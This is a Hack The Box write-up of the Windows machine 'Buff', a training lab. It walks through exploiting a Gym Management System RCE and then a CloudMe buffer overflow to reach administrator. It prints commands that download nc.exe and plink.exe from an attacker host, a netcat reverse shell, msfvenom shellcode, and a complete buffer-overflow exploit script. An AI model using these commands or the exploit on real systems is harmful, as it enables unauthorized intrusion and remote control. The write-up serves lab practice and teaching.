Hack The Box - Buff Writeup

7 minute read

Hack The Box - Buff image1

Enumeration

Add buff to hosts and start an nmap scan.

Nmap

Nmap scan report for buff.htb (10.10.10.198)
Host is up, received user-set (0.35s latency).
Scanned at 2020-07-29 06:51:48 EDT for 1034s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT     STATE SERVICE    REASON          VERSION
7680/tcp open  pando-pub? syn-ack ttl 127
8080/tcp open  http       syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   364.31 ms 10.10.14.1
2   364.15 ms buff.htb (10.10.10.198)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 29 07:09:02 2020 -- 1 IP address (1 host up) scanned in 1035.77 seconds

We have two open ports. The port 7680 is used by windows for updates and I did not find anything that can be leveraged.

Port 8080

A web application has been hosted on port 8080 image1

Going through the site, we can see that the site is built using Gym Management System 1.0

image1

Searchsploit

A quick search using searchsploit gives an RCE vulnerability in the software. (Make sure your searchsploit is updated)

kali@kali:~/Desktop/htb/buff$ searchsploit gym Management
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                  | php/webapps/48506.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

User Shell

Running the exploit gives us RCE.

kali@kali:~/Desktop/htb/buff$ python web.py
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

(+) Usage:       python web.py <WEBAPP_URL>
(+) Example:     python web.py 'https://10.0.0.3:443/gym/'
kali@kali:~/Desktop/htb/buff$ python web.py http://buff.htb:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> dir
�PNG

 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

02/08/2020  06:43    <DIR>          .
02/08/2020  06:43    <DIR>          ..
02/08/2020  06:43                53 kamehameha.php
               1 File(s)             53 bytes
               2 Dir(s)   9,423,310,848 bytes free

To get an interactive shell, we can transfer nc.exe file to the system and then start a reverse shell.

C:\xampp\htdocs\gym\upload> powershell -command "invoke-webrequest -uri http://10.10.14.5:8000/nc64.exe -outfile nc.exe"
�PNG


C:\xampp\htdocs\gym\upload> powershell "C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.5 8081"

Start a listener to receive the connection.

kali@kali:~/Desktop/tools/win$ nc -nlvp 8081
listening on [any] 8081 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.198] 50245
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

02/08/2020  06:44    <DIR>          .
02/08/2020  06:44    <DIR>          ..
02/08/2020  06:43                53 kamehameha.php
02/08/2020  06:44            45,272 nc.exe
               2 File(s)         45,325 bytes
               2 Dir(s)   9,423,396,864 bytes free

Root Shell

Running winPEAS shows that there are two services that are listening on ports 3306 and 8888.

  [+] Current Listening Ports(T1049&T1049)
   [?] Check for services restricted from the outside
    Proto     Local Address          Foreing Address        State
    TCP       127.0.0.1:3306                                Listening
    TCP       127.0.0.1:8888                                Listening

Further analysis of the port showed that the service listening on port 8888 is cloudme sync. This software has a buffer overflow vulnerability.

mycxclip
kali@kali:~/Desktop/tools/autorecon/results/buff.htb/scans$ searchsploit cloudme
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                             | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                    | windows/local/48499.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
kali@kali:~/Desktop/tools/autorecon/results/buff.htb/scans$

First we need to create a tunnel from the windows machine to the our kali machine so that we can interact with the cloudme service. This can be accomplished using plink.exe from putty.

  1. Copy the plink.exe binary.
  2. Start ssh on our system.
  3. connect the windows machine port to our system.
C:\xampp\htdocs\gym\upload>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

iPS C:\xampp\htdocs\gym\upload>invoke-webrequest -uri http://10.10.14.5:8000/plink.exe -outfile plink.exe
invoke-webrequest -uri http://10.10.14.5:8000/plink.exe -outfile plink.exe
PS C:\xampp\htdocs\gym\upload> dir
dir


    Directory: C:\xampp\htdocs\gym\upload


Mode                LastWriteTime         Length Name                                                                
----                -------------         ------ ----                                                                
-a----       02/08/2020     06:43             53 kamehameha.php                                                      
-a----       02/08/2020     06:44          45272 nc.exe                                                              
-a----       02/08/2020     06:48         675752 plink.exe                                                           


PS C:\xampp\htdocs\gym\upload> ./plink.exe kali@10.10.14.5 -R 8888:127.0.0.1:8888
./plink.exe kali@10.10.14.5 -R 8888:127.0.0.1:8888
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Using username "kali".
kali@10.10.14.5's password: **********

Linux kali 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program a
re described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug  1 08:02:50 2020 from 10.10.14.2
kali@kali:~$

We can see the prompt of our system when the connection is established. Now we can run the buffer overflow exploit.

  1. Create a msfvenom payload. 
     kali@kali:~/Desktop/htb/buff$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8082 -b "\x00\x0d\x0a" -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload =  b""
payload += b"\xbd\xaf\x84\x7b\x34\xda\xdb\xd9\x74\x24\xf4\x5f"
payload += b"\x2b\xc9\xb1\x52\x31\x6f\x12\x83\xef\xfc\x03\xc0"
payload += b"\x8a\x99\xc1\xe2\x7b\xdf\x2a\x1a\x7c\x80\xa3\xff"
payload += b"\x4d\x80\xd0\x74\xfd\x30\x92\xd8\xf2\xbb\xf6\xc8"
payload += b"\x81\xce\xde\xff\x22\x64\x39\xce\xb3\xd5\x79\x51"
payload += b"\x30\x24\xae\xb1\x09\xe7\xa3\xb0\x4e\x1a\x49\xe0"
payload += b"\x07\x50\xfc\x14\x23\x2c\x3d\x9f\x7f\xa0\x45\x7c"
payload += b"\x37\xc3\x64\xd3\x43\x9a\xa6\xd2\x80\x96\xee\xcc"
payload += b"\xc5\x93\xb9\x67\x3d\x6f\x38\xa1\x0f\x90\x97\x8c"
payload += b"\xbf\x63\xe9\xc9\x78\x9c\x9c\x23\x7b\x21\xa7\xf0"
payload += b"\x01\xfd\x22\xe2\xa2\x76\x94\xce\x53\x5a\x43\x85"
payload += b"\x58\x17\x07\xc1\x7c\xa6\xc4\x7a\x78\x23\xeb\xac"
payload += b"\x08\x77\xc8\x68\x50\x23\x71\x29\x3c\x82\x8e\x29"
payload += b"\x9f\x7b\x2b\x22\x32\x6f\x46\x69\x5b\x5c\x6b\x91"
payload += b"\x9b\xca\xfc\xe2\xa9\x55\x57\x6c\x82\x1e\x71\x6b"
payload += b"\xe5\x34\xc5\xe3\x18\xb7\x36\x2a\xdf\xe3\x66\x44"
payload += b"\xf6\x8b\xec\x94\xf7\x59\xa2\xc4\x57\x32\x03\xb4"
payload += b"\x17\xe2\xeb\xde\x97\xdd\x0c\xe1\x7d\x76\xa6\x18"
payload += b"\x16\x73\x3d\x2c\xe3\xeb\x43\x30\xf4\x79\xca\xd6"
payload += b"\x60\x6e\x9b\x41\x1d\x17\x86\x19\xbc\xd8\x1c\x64"
payload += b"\xfe\x53\x93\x99\xb1\x93\xde\x89\x26\x54\x95\xf3"
payload += b"\xe1\x6b\x03\x9b\x6e\xf9\xc8\x5b\xf8\xe2\x46\x0c"
payload += b"\xad\xd5\x9e\xd8\x43\x4f\x09\xfe\x99\x09\x72\xba"
payload += b"\x45\xea\x7d\x43\x0b\x56\x5a\x53\xd5\x57\xe6\x07"
payload += b"\x89\x01\xb0\xf1\x6f\xf8\x72\xab\x39\x57\xdd\x3b"
payload += b"\xbf\x9b\xde\x3d\xc0\xf1\xa8\xa1\x71\xac\xec\xde"
payload += b"\xbe\x38\xf9\xa7\xa2\xd8\x06\x72\x67\xe8\x4c\xde"
payload += b"\xce\x61\x09\x8b\x52\xec\xaa\x66\x90\x09\x29\x82"
payload += b"\x69\xee\x31\xe7\x6c\xaa\xf5\x14\x1d\xa3\x93\x1a"
payload += b"\xb2\xc4\xb1"

  2. Replace the payload in the exploit.

     # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
 # Date: 2020-04-27
 # Exploit Author: Andy Bowden
 # Vendor Homepage: https://www.cloudme.com/en
 # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
 # Version: CloudMe 1.11.2
 # Tested on: Windows 10 x86

 #Instructions:
 # Start the CloudMe service and run the script.

 import socket

 target = "127.0.0.1"

 padding1   = b"\x90" * 1052
 EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
 NOPS       = b"\x90" * 30

 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
 payload =  b""
 payload += b"\xbd\xaf\x84\x7b\x34\xda\xdb\xd9\x74\x24\xf4\x5f"
 payload += b"\x2b\xc9\xb1\x52\x31\x6f\x12\x83\xef\xfc\x03\xc0"
 payload += b"\x8a\x99\xc1\xe2\x7b\xdf\x2a\x1a\x7c\x80\xa3\xff"
 payload += b"\x4d\x80\xd0\x74\xfd\x30\x92\xd8\xf2\xbb\xf6\xc8"
 payload += b"\x81\xce\xde\xff\x22\x64\x39\xce\xb3\xd5\x79\x51"
 payload += b"\x30\x24\xae\xb1\x09\xe7\xa3\xb0\x4e\x1a\x49\xe0"
 payload += b"\x07\x50\xfc\x14\x23\x2c\x3d\x9f\x7f\xa0\x45\x7c"
 payload += b"\x37\xc3\x64\xd3\x43\x9a\xa6\xd2\x80\x96\xee\xcc"
 payload += b"\xc5\x93\xb9\x67\x3d\x6f\x38\xa1\x0f\x90\x97\x8c"
 payload += b"\xbf\x63\xe9\xc9\x78\x9c\x9c\x23\x7b\x21\xa7\xf0"
 payload += b"\x01\xfd\x22\xe2\xa2\x76\x94\xce\x53\x5a\x43\x85"
 payload += b"\x58\x17\x07\xc1\x7c\xa6\xc4\x7a\x78\x23\xeb\xac"
 payload += b"\x08\x77\xc8\x68\x50\x23\x71\x29\x3c\x82\x8e\x29"
 payload += b"\x9f\x7b\x2b\x22\x32\x6f\x46\x69\x5b\x5c\x6b\x91"
 payload += b"\x9b\xca\xfc\xe2\xa9\x55\x57\x6c\x82\x1e\x71\x6b"
 payload += b"\xe5\x34\xc5\xe3\x18\xb7\x36\x2a\xdf\xe3\x66\x44"
 payload += b"\xf6\x8b\xec\x94\xf7\x59\xa2\xc4\x57\x32\x03\xb4"
 payload += b"\x17\xe2\xeb\xde\x97\xdd\x0c\xe1\x7d\x76\xa6\x18"
 payload += b"\x16\x73\x3d\x2c\xe3\xeb\x43\x30\xf4\x79\xca\xd6"
 payload += b"\x60\x6e\x9b\x41\x1d\x17\x86\x19\xbc\xd8\x1c\x64"
 payload += b"\xfe\x53\x93\x99\xb1\x93\xde\x89\x26\x54\x95\xf3"
 payload += b"\xe1\x6b\x03\x9b\x6e\xf9\xc8\x5b\xf8\xe2\x46\x0c"
 payload += b"\xad\xd5\x9e\xd8\x43\x4f\x09\xfe\x99\x09\x72\xba"
 payload += b"\x45\xea\x7d\x43\x0b\x56\x5a\x53\xd5\x57\xe6\x07"
 payload += b"\x89\x01\xb0\xf1\x6f\xf8\x72\xab\x39\x57\xdd\x3b"
 payload += b"\xbf\x9b\xde\x3d\xc0\xf1\xa8\xa1\x71\xac\xec\xde"
 payload += b"\xbe\x38\xf9\xa7\xa2\xd8\x06\x72\x67\xe8\x4c\xde"
 payload += b"\xce\x61\x09\x8b\x52\xec\xaa\x66\x90\x09\x29\x82"
 payload += b"\x69\xee\x31\xe7\x6c\xaa\xf5\x14\x1d\xa3\x93\x1a"
 payload += b"\xb2\xc4\xb1"
 overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

 buf = padding1 + EIP + NOPS + payload + overrun 

 try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((target,8888))
     s.send(buf)
 except Exception as e:
     print(sys.exc_value)

  3. Start a msf listener and run the exploit.

     kali@kali:~/Desktop/htb/buff$ sudo msfconsole
 [sudo] password for kali:

 Call trans opt: received. 2-19-98 13:24:18 REC:Loc

 Trace program: running

    wake up, Neo...
 the matrix has you
 follow the white rabbit.

   knock, knock, Neo.

                 (`.         ,-,
                 ` `.    ,;' /
                  `.  ,'/ .'
                   `. X /.'
         .-;--''--.._` ` (
       .'            /   `
      ,           ` '   Q '
      ,         ,   `._    \
   ,.|         '     `-.;_'
   :  . `  ;    `  ` --,.._;
    ' `    ,   )   .'
       `._ ,  '   /_
          ; ,''-,;' ``-
           ``-..__``--`

                      https://metasploit.com


=[ metasploit v5.0.97-dev
+ -- --=[ 2043 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

    Metasploit tip: Open an interactive Ruby terminal with irb

    msf5 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf5 exploit(multi/handler) > set lhost 10.10.14.5 lhost => 10.10.14.5 msf5 exploit(multi/handler) > set lport 8082 lport => 8082 msf5 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 10.10.14.5:8082 ^C[-] Exploit failed [user-interrupt]: Interrupt [-] run: Interrupted msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf5 exploit(multi/handler) > run

    [] Started reverse TCP handler on 10.10.14.5:8082 [] Command shell session 1 opened (10.10.14.5:8082 -> 10.10.10.198:50263) at 2020-08-02 02:08:38 -0400

    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami whoami buff\administrator

And we are root!

Notes

The buffer overflow method can also be executed without plink. We can convert the python script to a standalone exe and execute it on the windows machine to get root

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.